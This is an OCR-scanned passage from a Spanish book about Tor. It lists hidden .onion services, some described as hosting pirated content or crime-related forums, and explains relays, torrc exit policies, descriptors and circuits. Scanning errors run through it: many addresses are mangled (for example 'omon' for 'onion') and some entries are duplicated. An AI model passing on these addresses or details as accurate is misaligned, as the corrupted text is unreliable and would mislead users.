La unica forma de acceder a los servicios que se encuentran alojados en la web profunda de Tor es 
por medio de una instancia correctamente configurada con su correspondiente proxy SOCKS, el 
cual se levanta automaticamente en cualquier instancia si la propiedad “SocksPorf ’ tiene un valor 
superior a “0” y ademas, evidentemente es necesario conocer la direccion del servicio que se desea 
visitar. Los servicios que se encuentran alojados en la web profunda de Tor, salvo algunos casos 
concretos, no suelen ser servicios dedicados que se encuentran disponibles todo el tiempo, de hecho, 
muchos servicios ocultos son creados y gestionados por usuarios de la red que utilizan sus propios 
ordenadores para publicar dichos servicios. 

Cualquier usuario puede configurer muy facilmente un servicio oculto en la web profunda de Tor, 
solamente es necesario utilizar las opciones de configuration adecuadas en el fichero "torrc" y 
levantar un servicio en el puerto indicado. Debido a que unicamente en casos concretos existen 
servicios ocultos dedicados y disponibles 24/7, es muy frecuente encontrar servicios itinerantes, que 
se encuentran disponibles en una franja horaria concreta o que se encuentran disponibles durante 
un tiempo y luego desaparecen completamente. Dicho esto, para conocer la web profunda de Tor es 
necesario realizar busquedas y navegar con ffecuencia para encontrar nuevos sitios con contenidos 
que puedan ser de interes. 

4.1.4.1.1 Servicios de almacenamiento 


Direccion ONION 

http://torsafeiwttlkul6.omon/ 

Nombre del servicio 

Tor Safe 

Descripcion 

Se trata de un servicio que permite el almacenamiento de ficheros de todo tipo de forma segura y 
confidencial. Cuenta con algunas caracteristicas interesantes, tales como la posibilidad de compartir 
documentos, crear una wiki con un editor WYSIWYG y gestion de versiones. 


Direccion ONION 

http://imgbifwwqoixh7te.omon/ 

Nombre del servicio 

img.bi 

Descripcion 

Servicio anonimo para subir imagenes y compartirlas con otros usuarios en Tor. 


Direccion ONION 

http://wuvdsbmbwyjzsgei.omon/ 

Nombre del servicio 

HFS 

Descripcion 

Servicio anonimo para subir y descargar musica de cualquier genera. 


Direccion ONION 


http://uj3wazyk5u4hnvtk.omon/ 
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Nombre del servicio I The Pirate Bay_ 

Description _— 

Se trata de un sitio muy popular en la web clara y que ha sido varias veces censurado por compartir 

torrents con contenidos protegidos o incluso ilegales. En esta ocasion. The Pirate Bay puede ser 
encontrado en la web profunda de Tor._ 


Direccion ONION 

http://torvDs7kzis5uifc.omon/index.php/TorVPS 

Nombre del servicio 

TorVPS 

Descripcion_ __—-- 

Permite la creation de servicios ocultos con direcciones onion dedicadas. Es un servicio gratuito que 

permite tener diferentes tipos de servicios en la web profunda accesibles todo el tiempo. 


Direccion ONION 

http://popfilesxuru71sr.onion/ 

Nombre del servicio 

PopFiles 

Descripcion --- 

Se trata de un servicio muy simple que permite subir ficheros y protegerlos por medio de un usuarto 

y una contrasena. 



Direccion ONION 

http://k4dsqs7v5xm3qtsl.omon/ 

Nombre del servicio 

TorFileHost 

Descripcion -.- 

Se trata de un servicio de almacenamiento de documentos. Es necesario crear una cuenta para poder 

gestionar los contenidos que se han subido. 


Direccion ONION 

http://hostine6iar5zo7c.omon/ 


Nombre del serv icio 


Real Hosting 


Descripcion 


Servicio de hosting en la web profunda de Tor. Con una cuenta gratuita es posible acceder a un do- 
minio “.onion” con personalization de las siete primeras letras de la direccion. Es posible desplegar 
cualquier aplicacion basada en Apache, PHP y MySQL._. 


Direccion ONION 

http://torlinkbgs6aabns.omon/ 

Nombre del servicio 

Tor Links 

Descripcion - 

Sitio que contiene un listado de los principales servicios que se encuentran dispontbles en la web 
profunda de Tor. Cada enlace se encuentra incluido en una categoria distinta y algunas de dichas 
categorias, pueden ser de caracter ilegal, asi que se recomienda precaution a la hora de interactuar 

con dichos sitios. 



Direccion ONION 

http://hss3uro2hsxfogfq.omon/ 

Nombre del servicio 

NotEvil 

Descripcion___ 
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Un servicio de busqueda con miles de sitios onion indexados y con un buscador mas rapido y preci- 
so. Permite a cualquier usuario anadir una direccion “onion” en el motor de busqueda simplemente 
rellenando un formulario y de esta forma, mas usuarios en la web profunda podran encontrar el 
servicio oculto. 


Direccion ONION 

http://msydqstlz2kzerdg.omon/search/ 

Nombre del servicio 

AHMIA 

Descripcion 

AHMIA es uno de los servicios ocultos mas populares en la web profunda de Tor debido a que es un 
motor de busqueda muy completo que no solamente suministra direcciones onion interesantes, sino 
que tambien se encarga de filtrar contenidos maliciosos. 


Direccion ONION 

http://grams7enufi7jmdl.omon/ 

Nombre del servicio 

Grams 

Descripcion 

Grams es un buscador simple que permite aplicar un criterio de busqueda y recuperar rapidamente 

resultados al usuario. 



Direccion ONION _ http://xmh57 jrzmw6insl.onion/ _ 

Nombre del servicio _ TorCH Search Engine _ 

Descripcion _ 

Se trata de un sitio muy util para navegar en la web profunda de Tor ya que cuenta con miles de 
direcciones “onion” indexadas, funcionando de un modo muy similar a otros buscadores en la web 
clara. 


Direccion ONION 

http://3g2upl4pq6kufc4m.omon/ 

Nombre del servicio 

DuckDuckGo 

Descripcion 

Se trata del conocido buscador duckduckgo el cual tambien se encuentra disponible en la web pro¬ 
funda de Tor como un servicio anonimo. 


Direccion ONION _ http://zqktlwi4fecvo6ri.onion/ _ 

Nombre del servicio _The Hidden Wiki 

Descripcion_ 

Se trata de una wiki que funciona de un modo similar a Wikipedia , en la que es posible agregar, 
modificar y en algunos casos, eliminar articulos y resenas. Su pagina principal incluye un listado 
muy complete de sitios en la web profunda con toda clase de contenidos._ 


Direccion ONION 

http://dimxxdraygbifgc.omon/ 

Nombre del servicio 

OnionDir - Deep Web Link Directory 

Descripcion 

Se trata de un servicio de directorio muy similar a “The Hidden Wiki” en donde se pueden encontrar 
enlaces a sitios en la web profunda de Tor. 
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Direction ONION 

hltp://32rfckwuorlf4dlv.onion/ 

Nombre del servicio 

Onion Url Repository 

Description 

Servicio similar a Tor Links y Onion Dir con la diferencia de que el administrador de la pagina se 
encarga de remover enlaces que esten relacionados con actividades ilegales. Ademas contiene recur- 
sos y foros para aprender sobre privacidad y anonimato. 


Direction ONION 

http://soupksx6vqh3ydda.omon/ 

Nombre del servicio 

Onion Soup 

Description 

Enlaces en la web profunda relacionados con bases de datos de direcciones “.onion”, buscadores de 
servicios ocultos, redes sociales, entre otros recursos interesantes. 


Direction ONION 

http://bdpuqvsqmphctrcs.omon/ 

Nombre del servicio 

Yet another Tor Directory. 

Description 

Este servicio contiene un listado de mas de 4000 direcciones onion en la web profunda de Tor con 
todo tipo de contenidos. Se caracteriza por estar constantemente actualizado y ejecutar procesos 
de crawling contra la web profunda de Tor para recuperar la mayor cantidad de enlaces posibles. 


4.1.4.1.3 Foros, wikis y documentacion 


Direction ONION 

http://libraryqtlpitkix.onion/library/ 

Nombre del servicio 

The Library 

Description 

Una de las librerias mas antiguas en la web profunda de Tor, Tiene contenidos de varios generos, 
tales como informatica, biologia, matematicas, neurociencia, electronica, ingenieria, entre otros te- 

mas interesantes. 



Direction ONION 

http://xfmro77i31ixucja.omon/ 

Nombre del servicio 

Imperial Library of Trantor 

Description 

Se trata de una de las librerias mas completas que hay en la web profunda de Tor. Contiene miles de 
libros sobre categorias muy variadas que pueden ser descargados sin coste alguno. Tambien permi- 
ten que cualquiera pueda registrarse y compartir libros con otros usuarios. 


Direction ONION 

http://c3jemx2ube5v5zpg.omon/ 

Nombre del servicio 

Jotunbane’s Reading Club (Readers Against DRM) 

Description 

Se trata de una comunidad de usuarios que comparten libros, opiniones, experiences o incluso sus 
propios escritos con la finalidad de que otros comenten y les den un feedback. 


Direction ONION 

http://pyl7a4ccwgpxm6rd.omon/ 

Nombre del servicio 

CODE:GREEN 
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Description_ 

Pagina de hacktivistas en la que se planifican y organizan protestas en la red. Lleva mas de dos anos 
en fimcionamiento a la fecha de redactar este documento e intenta promover la participation de todos 
sus visitantes. 


Direccion ONION 

http://ak2uqfavwgmjrvtu.onion 

Nombre del servicio 

GlobalLeaks 

Descripcion 


Por medio de esta plataforma cualquiera puede reportar o filtrar informacion sobre acciones inde- 
bidas por parte de organizaciones o gobiemos, tales como violaciones a derechos fundamentales o 
cualquier tipo de abuso. Se encuentra diseiiada para proteger a toda costa la identidad de la persona 
que suministra dichos reportes y utiliza la plataforma “GlobaLeaks”, la cual se encuentra disponible 
en la web clara en el siguiente enlace https://globaleaks.org. 


Direccion ONION _ http://jwgkxry7xjeaeg5d.onion/ _ 

Nombre del servicio _ WikiLeaks _ 

Descripcion_ 

Wikileaks era una organization sin a nim o de lucro cuya principal funcion era la de publicar fil- 
traciones con informacion sensible y en algunos casos, bastante embarazosa sobre organizaciones 
publicas, privadas o gobiemos. En este caso, se trata de un servicio oculto que mantiene esa misma 
filosofia y que a la fecha de redactar este documento sigue en fimcionamiento. 


Direccion ONION 

bttp://yuxv6qujajqvmypv.onion/ 

Nombre del servicio 

A Beginner Friendly Comprehensive Guide to Installing and Using a 
Safer Anonymous Operating System. 

Descripcion 

Se trata de una guia muy recomendable sobre la instalacion y uso de un sistema Debian con las herra- 
mientas y utilidades necesarias para tener un nivel adecuado de anonimato y seguridad. 


Direccion ONION 

http://3cpleimu2getp5q7.onion/library/ 

Nombre del servicio 

SIN Library 

Descripcion 

Libreria muy completa sobre diversas tematicas del conocimiento humano. Contenidos sin ningun 

tipo de censura. 



Direccion ONION 

http://nzwolake3hokkj wq .onion/ 

Nombre del servicio 

cultura 

Descripcion 

Se trata de una libreria con miles de ebooks en castellano. 


Direccion ONION 

http://nzwolake3hokkjwq.onion/ 

Nombre del servicio 

Clockwise Library 

Descripcion 

Libreria con cientos de libros en diferentes formatos y con un buscador bastante preciso. 
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Direccion ONION 

http ://tssa3 saypkimmkcy. onion/ 

Nombre del servicio 

The Secret Story Archive 

Descripcion 

Servicio oculto que cuenta con cientos de historias y relates cortos. 


Direccion ONION 

http://hackcanl2o41vmnv.omon 

Nombre del servicio 

Hack Canada 

Descripcion 

Se trata de un servicio oculto con cientos de recursos muy interesantes sobre seguridad informatica 
y hacking. Tambien incluye enlaces y documentacion sobre anonimato, censura, leyes y filtraciones 
de todo tipo. 


Direccion ONION 

http://thehub7gqe43miyc.omon/ 

Nombre del servicio 

The Hub 

Descripcion 

Foro en la web profunda de Tor con multiples temas de discusion sobre seguridad informatica, hac¬ 
king, anonimato entre otras cosas. 


Direccion ONION 

http://hackerw6dcplg3 ej .onion/ 

Nombre del servicio 

Hacker Place 

Descripcion 

Sitio con varios libros y recursos sobre desarrollo de software, pentesting y hacking. 


Direccion ONION 

http://7rmath4ro2of2a42.omon 

Nombre del servicio 

Soylent News 

Descripcion 

Servicio que se centra en la publication de articulos sobre tecnologla, ciencia y otros asuntos de in¬ 
terns general. Se encuentra mantenido por un grupo de voluntaries que se encargan de subir articulos 
y noticias que pueden ser visualizados y comentados por cualquier usuario. 


Direccion ONION 

http ://ogatl5 7 cbva6tncg. onion/ 

Nombre del servicio 

Exilio 0 lugar dos pensadores e sonhadores. 

Descripcion 

Se trata de uno de los foros en portugues mas completes de la web profunda de Tor. Trata sobre temas 
de hacking, seguridad informatica, anonimato, criptografia, entre otras cosas. 


Direccion ONION _ http://s6cco2jylmxqcdeh.onion _ 

Nombre del servicio _ Cebolla Chan _ 

Descripcion_ 

Se trata de uno de los foros en Castellano mas conocidos en la web profunda de Tor. Incluye varias 
categorias de discusion en las que en algunos casos se habla abiertamente sobre actividades delicti- 
vas, no obstante tambien hay categorias en las que se incluyen manuales y tutoriales muy interesantes 
sobre tecnologla. _ 
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4.1.4.1.4 Servicios varios 


Direccion ONION 

http://torbox3uiot6wchz.onion/ 

Nombre del servicio 

TorBox 

Description 

Servicio de correo electronico anonimo que permite enviar y recibir mensajes en la red de Tor. 


Direccion ONION _ http://ol56t3xahrpk2b62.onion/ _ 

Nombre del servicio _ Is online that hidden service _ 

Description_ 

A veces una instancia de Tor puede estar mal configurada o el acceso a la web profunda es tan lento 
que la conexion a un sitio web se corta antes de recibir una respuesta por parte del servidor. Para 
asegurarse de que un servicio oculto se encuentra activo o caido, “Is online that Hidden service” 
servira para despejar cualquier duda al respecto. 


Direccion ONION _ http://ofkztxcohimx341a.onion/ _ 

Nombre del servicio _ WTF is my IP? _ 

Description_ 

Para asegurarse de que el navegador web se encuentra correctamente configurado para acceder a la 
web profunda de Tor, el servicio “checktor” de Tor ubicado en https://check.torproject.org/ es un 
buen recurso, sin embargo, para conocer mas detalles sobre las cabeceras HTTP y cualquier fuga de 
information que pueda producirse, el servicio “WTF is my IP?” puede ser muy util. _ 


Direccion ONION 

http://zerobinqmdqd236y.onion/ 

Nombre del servicio 

ZeroBin 

Description 

Se trata de un PasteBin en el que los mensajes se pueden cifrar, marcar el tiempo de caducidad, 
destruir despues de ser leido y puede ser expuesto de forma publica en forma de discusion como si 
se tratara de un foro abierto o privado. 


Direccion ONION 

http://theches3nacocgsc. onion/ 

Nombre del servicio 

TheChess 

Description 

Servicio oculto en el que es posible jugar al ajedrez con otros jugadores y entrar en competiciones. 


Direccion ONION _ http://jlve2y45zacpbz6s.onion/ _ 

Nombre del servicio _ TorStatus _ 

Description_ 

Permite ver el estado de la red en tiempo real. Ensena los repetidores que se encuentran activos y sus 
detalles de configuration mas importantes, como por ejemplo el nombre del enrutador, pais, ancho 
de banda aportado, puerto de “Onion Routing”, puerto de directorio, sistema operativo, etc._ 


Direccion ONION 

http://4iahqcjrtmxwofr6.omon/ 

Nombre del servicio 

Strategic Intelligence Network 
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Description_ 

Se trata de un servicio que se encarga de analizar los ultimos acontecimientos en todos los paises 
del mundo y calcular una escala que recibe el nombre de “SecCon” o “Security Conditions”. Dicha 
escala determina el nivel de amenaza de un pais y si es seguro estar en el, ya sea como turista o como 
residente. Se trata de un servicio que se actualiza constantemente, dependiendo evidentemente de la 
information que se publica en los principales medios de comunicacion. Otra caracteristica intere- 
sante, es que cada “SecCon” tiene un color distinto dependiendo del riesgo que corren las personas 
que se encuentran alii y cuando se selecciona un pais del mapa, ensena una resena breve de la infor¬ 
mation que se ha utilizado para asumir el nivel de “SecCon” correspondiente y algunas medidas que 
deben tomar a la hora de viajar a dicho lugar. 


Direccion ONION 

http://76qugh5bey5gum71.onion/ 

Nombre del servicio 

Deep Web Radio 

Description 

Contiene un listado de canales de Radio en todo el mundo, los cuales pueden ser escuchados con el 
programa AnonyPlayer, el cual tambien puede ser descargado desde Deep Web Radio. 


Direccion ONION 

http://blkbook3fxhcsn3u.omon/ 

Nombre del servicio 

Black Book 

Description 

Red social en la web profunda de Tor que permite crear listas de contactos o incluso comunidades 
para compartir documentos e imagenes. 


Direccion ONION _ http://torsniffrqyvkv4x.omon/ _ 

Nombre del servicio _ TorSniff _ 

Description_ 

Se trata de un servicio que permite realizar peticiones HTTP contra otros servicios en la web pro¬ 
funda de Tor y posteriormente analizar las respuestas. Es una altemativa a otros servicios en la web 
clara tales como http://testuri.org/ o http://web-sniffer.net/ pero enfocado completamente a servicios 
ocultos en la web profunda de Tor. _ 


Direccion ONION 

http://grams7enufi7jmdl.omon/ 

Nombre del servicio 

Grams 

Description 

Grams es un buscador simple que permite aplicar un criterio de busqueda y recuperar rapidamente 

resultados al usuario. 



Direccion ONION 

http ://sigaintevyh2rzvw. onion/ 

Nombre del servicio 

SIGAINT 

Descripcion 

Servicio de mensajeria que permite enviar y recibir mensajes de correo electronico sin revelar la 
identidad o localization del remitente de los mensajes. Su objetivo principal es el de proteger la 
identidad y privacidad de sus usuarios. 
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4.2 Arquitectura 

Las secciones anteriores de este capitulo han explicado el uso de Tor desde el punto de vista de un 
usuario, sin embargo se ha hablado someramente sobre el funcionamiento intemo y la arquitectura 
de esta potente solution para la privacidad y el anonimato de cualquier usuario en Internet y en esta 
section, se intentara explicar sus componentes e integration de cada uno de ellos. Antes de continuar 
y del mismo modo que ocurre con otras redes anonimas explicadas previamente, es importante 
tener buenos conocimientos sobre redes y el modelo OSI, asi como los conceptos fundamentales de 
criptografia. 


4.2.1 Repetidores 

Se trata de una instancia de Tor que se encuentra en condiciones de aceptar y replicar el trafico 
proveniente de otra instancia de Tor. De esta forma, los repetidores pueden verse como servidores 
proxy transparentes que enrutan trafico al siguiente salto de un circuito. Los repetidores son el 
elemento fundamental de la red, ya que permiten a los usuarios navegar por Internet o la web 
profunda utilizando el protocolo de Tor como plataforma de anonimato. Cualquier cliente puede 
actuar como un repetidor en un momento dado, solamente es necesario establecer las opciones 
de configuration adecuadas en el fichero “torrc” utilizado para iniciar la instancia de Tor, ademas 
tambien es posible especificar un tope maximo de ancho de banda que el repetidor puede aportar a la 
red. Todos los voluntarios que desean convertir su instancia de Tor en un repetidor, deben especificar 
uno de dos posibles tipos de repetidores: intemos o extemos. 

Repetidores interims 

Se trata de repetidores que unicamente enrutan trafico al interior de la red y HaHa* sus caracteristicas, 
no tienen la capacidad de acceder de forma directa a los paquetes de datos que viajan entre el cliente 
y el destino, unicamente se encargan de suprimir la capa de ciffado correspondiente a su propia 
clave privada y acceder a la information necesaria para enrutar el trafico hacia el siguiente salto del 
circuito. 

Repetidores externos 

Se trata de repetidores que pueden enrutar trafico al exterior de la red, es decir, que pueden enviar 
los paquetes de datos de los clientes al correspondiente destino. Dadas sus caracteristicas, tienen 
la capacidad de acceder de forma directa a la informacion que se incluye en los paquetes de datos 
que viajan entre el cliente y el destino, ya que los repetidores extemos, o tambien conocidos como 
nodos de salida en un circuito, se encargan de suprimir la ultima capa de cifrado correspondiente al 
protocolo de Tor y de esta forma, no solamente tienen la capacidad de descubrir cual es el destino 
final de dichos paquetes, sino que tambien tienen la posibilidad de leer sus contenidos. 

Los repetidores en Tor permiten a los clientes componer circuitos, los cuales funcionan como una 
cadena de servidores proxy que se encargan de recibir los paquetes de datos ciffados por parte de los 
clientes y enrutarlos a su correspondiente destino. Los circuitos en Tor, a diferencia de los tuneles en 
I2P son bidireccionales, esto quiere decir que un circuito puede ser utilizado tanto para enviar como 
para recibir paquetes de datos. 
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Por otro lado, los repetidores publican informacion sobre sus caracteristicas principals en la red de Tor 
por medio de los documentos conocidos como “ Descriptores Esta informacion es posteriormente 
utilizada por los clientes para saber de que forma se pueden comunicar con el repetidor y solicitar 
informacion tan importante como la clave publica del repetidor para cifrar paquetes de datos que 
viajaran por un circuito. 

Para indicarle a una instancia de Tor que debe fimcionar como un repetidor, se debe editar el fichero 
de configuracion maestro “ torrc ” y posteriormente establecer como minimo, las siguientes opciones 
de configuracion: 

ORPort 443 

Exitpolicy reject *:* 

Nickname AdastraTor 

Contactlnfo adastra at thehackerway dot com 

En este caso, el puerto indicado en la propiedad “ ORPort ” debe ser accesible a otras maquinas en 
Internet, ya que sera utilizado por los clientes de Tor para comunicarse con dicha instancia. Por 
otro lado, la propiedad “ Exitpolicy ” es de vital importancia, ya que es la que permite indicar si el 
repetidor es intemo o extemo. En este caso concreto, la politica de salida de paquetes de datos es 
completamente restrictiva, lo que les indica a las autoridades de directorio y a los clientes que el 
repetidor solamente podra enrutar trafico al interior de la red y bajo ningun concepto permitira el 
reenvio de paquetes hacia Internet. En el caso de configurar un repetidor extemo, se deben indicar 
politicas de salida mucho mas permisivas, como por ejemplo las que se indican a continuacion: 

ExitPolicy accept *:80, accept *:443, accept *:110, accept *:143, accept *:993, 
accept *:995 

En este caso se indica explicitamente que los paquetes de datos cuyo puerto de destino sea cualquiera 
de los indicados, se admite el reenvio del paquete y de esta forma, el repetidor actuara como un nodo 
de salida para los circuitos que los clientes construyen. 

Es importante tener en cuenta que los repetidores de salida enrutan informacion hacia otros destinos 
en piano, tal como se vera con mucho mas detalle en una proxima section y que ademas, no tienen 
un control sobre los contenidos que se envian hacia Internet ni sus correspondientes destinos. Esta 
situation puede ser especialmente problematica para el administrador del repetidor cuando otros 
usuarios en la red crean circuitos utilizando su repetidor como punto de salida y utilizan dicho 
circuito para realizar actividades ilegales. 

El problema para el administrador del repetidor es que evidentemente desconoce el origen de los 
paquetes y ademas, es posible que una autoridad competente detecte dicho trafico de datos y lo que 
podran obtener es el punto de salida del circuito, es decir, la direction IP de la persona del repetidor. 

Evidentemente las consecuencias pueden ser bastante desagradables para el administrador ya que 
para las autoridades, los paquetes de datos o el destino de los mismos tienen tematica ilegal o 
maliciosa y el origen de los mismos ha sido el repetidor de salida en cuestion. Dicho esto, si se 
establece un repetidor de salida es muy importante afinar adecuadamente las politicas de aceptacion 
y rechazo. 
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Cuando una instancia de Tor utiliza las opciones de configuracion anteriores, lo primero que realiza 
la instancia son las comprobaciones de conectividad, que tal como se ha comentado anteriormente, 
su exito o fracaso depende de si el puerto especificado en la propiedad “ORPorF es accesible desde 
Internet. Estas comprobaciones suelen ser muy rapidas, aunque en algunos casos pueden tardar hasta 
20 minutos. Por otro lado, cuando una instancia se registra por primera vez en la red, las autoridades 
de directorio deben votar y aprobar la participation de dicho repetidor en la red, tal como se vera 
en una proxima section del presente capitulo, este proceso puede tardar entre 45 y 60 minutos, 
dependiendo de la hora en la que se ha generado el ultimo consenso por parte de las autoridades 
de directorio. En cualquier caso, es posible verificar el estado de un repetidor gracias al proyecto 
“ atlas ”, el cual se encuentra ubicado en la siguiente url: https://atlas.torproject.org/ 


4.2.2 Descriptores 

Los descriptores son documentos que almacenan informacion sobre los repetidores que conforman 
la red de Tor. Dichos documentos se encuentran disponibles de forma publica y cualquier usuario 
en Internet tiene la posibilidad de descargarlos, para hacerlo basta con ejecutar una petition HTTP 
contra las autoridades de directorio o una cache de directorio para obtener este tipo de documentos. 
En los ultimos anos el software de Tor y evidentemente la red han incorporado cambios importantes 
y dichas modificaciones han dado lugar a diferentes tipos de descriptores, los cuales se encuentran 
categorizados segun la informacion que almacenan. A continuation se listan los mas habituales. 

Server Descriptor 

Se trata del descriptor principal que publican los repetidores en las autoridades de directorio. Estos 
documentos contienen toda la informacion sobre el repetidor, incluyen sus politicas de salida, detalles 
sobre el ancho de banda aportado y consumido, direction IP, puerto “OR”, sistema operativo, entre 
otros detalles interesantes. En versiones antiguas de Tor, los clientes descargaban directamente este 
descriptor para cada uno de los repetidores que componen la red, pero debido a la cantidad de 
informacion que puede contener, en versiones mas recientes del software de Tor, los clientes ahora 
se encargan de descargar una version mas compacta de este fichero, lo que ha dado lugar a un tipo 
de descriptor conocido como “MicroDescriptor”. 

Extrainfo Descriptor 

Un descriptor de este tipo incluye informacion sobre el repetidor que no es requerida por los clientes 
para su correcto funcionamiento, con lo cual, los clientes de Tor no lo descargan por defecto. Estos 
descriptores son publicados por todos los repetidores de forma automatica, del mismo modo que 
ocurre con los descriptores del tipo “Server Descriptor ”, sin embargo, tal como se ha indicado 
anteriormente, no sen descargados por los clientes y es necesario realizar el proceso de obtencion 
de dichos ficheros de forma explicita en el caso de que se quiera acceder a la informacion que 
contienen. Para que una instancia de Tor pueda descargar este tipo de contenidos, es necesario 
indicar la siguiente option de configuracion en el fichero “ torrc ” de la instancia. 
DownloadExtralnfo 1 

No obstante, hay que tener en cuenta que las instancias de Tor, a la fecha de redactar este documento, 
no utilizan para nada la informacion que se almacena en dichos ficheros, sin embargo puede ser 
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interesante para un cliente obtener la information que se encuentra disponible en dichos ficheros 
para tener todos los detalles sobre los repetidores que se encuentran disponibles en la red. 

Micro Descriptor 

Los “ Server Descriptors ” son documentos que contienen mucha mas informacion de la que es 
necesaria para que un cliente pueda componer sus circuitos, por este motivo una de las mejoras que 
se ha aplicado en versiones recientes de Tor, son los “ Micro Descriptors ” los cuales son versiones 
minimalistas de los “ Server Descriptors ” con unicamente la informacion necesaria para crear 
circuitos de Tor, Los clientes descargan este tipo de descriptores por defecto, ya que de esta forma se 
ahorra ancho de banda al descargar documentos mucho mas compactos y con la informacion que es 
requerida para el correcto funcionamiento de las instancias cliente. Si por cualquier motivo resulta 
interesante obtener la informacion que se almacena en los “ Server Descriptors” , el cliente tiene la 
posibilidad de establecer en el fichero de configuration “ torrc ” la siguiente propiedad. 
UseMicrodescriptors 0 

Utilizando “ UseMicrodescriptors ” se le puede indicar a la instancia de Tor que debe modificar su 
comportamiento por defecto y descargar los “ Server Descriptors ” de los repetidores. 

Network Status Document 

Tal como se vera mas adelante en el presente capitulo, la red de Tor depende completamente del 
correcto funcionamiento de las autoridades de directorio, las cuales se encargan de generar un 
fichero conocido como “Network Status”, que es el resultado del proceso de votacion de todas las 
autoridades y contiene una serie de registros conocidos como “ Router Status Entry”. Este descriptor 
tambien suele ser encontrado en la terminologia de Tor simplemente como “consenso” y es un 
documento de vital importancia no solamente para las autoridades de directorio, sino tambien para 
las caches de directorio y los clientes. 

Router Status Entry 

Los documentos de “ Network Status ” estan compuestos por multiples entradas de “Router Status 
Entries ” y tal como su nombre lo indica. incluye informacion sobre cada uno de los repetidores de 
la red, sin embargo, dicha informacion es suministrada por las autoridades de directorio, las cuales 
establecen, entre otras cosas, flags y heuristicas para la selection de repetidores por parte de los 
clientes a la hora de componer circuitos. 

Hidden Service Descriptor 

Se trata de un documento muy importante para el correcto funcionamiento de los servicios ocultos 
en la web profunda de Tor y que es firmado y publicado por el servicio oculto propiamente dicho. 
Estos documentos son publicados a los servidores con la flag “ HSDir ”, los cuales componen una 
tabla distribuida del tipo hash ( Distributed Hash Table). El contenido de estos descriptores incluye 
la informacion que los clientes necesitan para comunicarse con el servicio oculto de forma anonima. 
Los contenidos de este fichero y su importancia en el protocolo de servicios ocultos se veran con 
mucho mas detalle en la section correspondiente a la creation y configuration de servicios ocultos 
que se encuentra disponible mas adelante en este capitulo. 
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4.2.3 Circuitos 

Se trata del canal de comunicacion bidireccional que permite a un cliente utilizar Tor como solution 
“ inproxy ” o “ outproxy ” Un circuito se compone por tres repetidores que actuan simplemente como 
servidores proxy para el envio de los paquetes entre el cliente y un destino determinado. El cliente 
es el responsable de construir sus propios circuitos y debe seleccionar los tres repetidores necesarios, 
por otro lado, el cliente debe solicitar la clave publica de cada uno de dichos repetidores, con el fin 
de cifrar los paquetes de datos con cada una de las claves publicas, de esta forma se crean paquetes 
de datos con multiples capas de cifrado. 

Cuando un cliente desea construir un circuito utilizando la information que ha podido obtener de del 
fichero de consenso descargado desde las autoridades de directorio o una de las cache de directorio, 
selecciona de forma aleatoria tres repetidores, de los cuales dos seran intemos y uno extemo. 

El repetidor extemo sera conocido de ahora en adelante como el nodo de salida del circuito y uno de 
los repetidores intemos actuara como nodo de entrada del circuito mientras que el otro actuara como 
nodo intermedio. Una vez seleccionados dichos repetidores, el cliente solicita a cada uno el envio 
de su correspondiente clave publica, la cual sera utilizada para cifrar los paquetes de datos que seran 
enviados por medio del circuito. 

Despues de obtener dichas claves, el cliente procede a cifrar cada uno de los paquetes de datos que 
desea enviar al destino en el siguiente orden: En primer lugar, el paquete de datos es cifrado con la 
clave publica del repetidor de salida, el resultado es el mismo paquete de datos pero con una capa 
de cifrado y a continuacion, el cliente utiliza la clave publica del repetidor intermedio para anadir 
una capa de cifrado adicional al paquete de datos y finalmente, el cliente utiliza la clave publica del 
repetidor de entrada para anadir la ultima capa de cifrado sobre el paquete de datos. 

A continuacion el cliente envia el paquete de datos cifrado al primer salto del circuito, es decir, al 
nodo de entrada. Cuando el nodo de entrada recibe un paquete de datos del cliente, dicho repetidor 
utiliza su clave privada para remover la capa de cifrado superior del paquete. El resultado de dicha 
operation es el mismo paquete, pero con dos capas de cifrado que unicamente se pueden descifrar 
con las claves privadas de los repetidores intermedios y salida. Despues de que el repetidor de 
entrada remueve la capa de cifrado correspondiente a su nodo, accede a la informacion del siguiente 
salto del circuito, es decir, la direction IP y puerto del repetidor intermedio. A continuacion le envia 
el paquete de datos que hasta este punto, unicamente contiene las capas de cifrado correspondientes 
a al nodo intermedio y salida. 

Posteriormente se aplica exactamente el mismo procedimiento en el repetidor intermedio, es decir, 
dicho repetidor utiliza su clave privada para remover una de las capas de cifrado del paquete y el 
resultado es el paquete de datos con una ultima capa de cifrado, la cual podra ser removida por el 
repetidor de salida. En este punto, el repetidor intermedio obtiene la informacion necesaria para 
enviar el paquete de datos al siguiente salto del circuito, es decir, al repetidor de salida. 

Finalmente, cuando el repetidor de salida recibe el paquete por parte del repetidor intermedio, aplica 
su clave privada para remover la ultima capa de cifrado. dando como resultado el paquete original 
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que el cliente desea enviar al destino. En este punto, tal como se ha comentado en parrafos anteriores, 
el repetidor de salida tiene acceso a la information que el cliente desea enviar al destino en texto 
piano, lo cual ha dado lugar a varios ataques contra el anonimato de los usuarios de Tor utilizando 
repetidores de salida maliciosos. 

Una buena solution para evitar este tipo de problemas, consiste en aplicar una capa de cifrado 
adicional utilizando cifrado punto a punto ( end-to-end) sobre el paquete de datos y no depender 
linicamente del protocolo de Tor para la protection de la information, de esta forma, los repetidores 
de salida maliciosos pierden efectividad y la mayoria de los ataques que pueden realizar ya no logran 
el efecto esperado. Una buena forma de aplicar una capa de cifrado adicional a los paquetes de datos 
que se envian por medio de un circuito de Tor, consiste en crear un tunel SSH cuyo punto final es 
evidentemente el destino, de esta forma los repetidores de salida maliciosos que intercepten los 
paquetes de datos hacia el destino en cuestion, no tendran la posibilidad de acceder a los paquetes 
en texto piano. 



Imogen 04.03: Envio de paquetes a Internet utilizando un circuito de Tor. 


4.2.4 Servicios ocultos 

Tal como se ha mencionado anteriormente en este capitulo, un servicio oculto puede ser de cualquier 
tipo, como por ejemplo servidores HTTP, FTP, SSH, SMB, etc. Se trata de servicios comunes 
que fiincionan utilizando la red de Tor para el envio y reception de paquetes y el unico requisite) 
obligatorio que debe cumplir cualquier servicio oculto es que utilice protocolo TCP o un envoltorio 
para convertir cualquier paquete de datos en otros protocolos como UDP a TCP. 

Como el lector podra imaginarse, dichos servicios pueden contener fallos de seguridad, los cuales 
pueden ser aprovechados por un atacante y de esta forma, conseguir romper su anonimato. Ejecutar 
procedimientos de pentesting contra servicios ocultos en Tor no es demasiado complejo y de hecho, 
es posible hacerlo sin conocimientos demasiado profundos sobre su arquitectura, tal como se podra 
apreciar en una proxima section de este documento. 

Por otro lado, una de las caracteristicas mas sobresalientes de la arquitectura de los servicios ocultos 
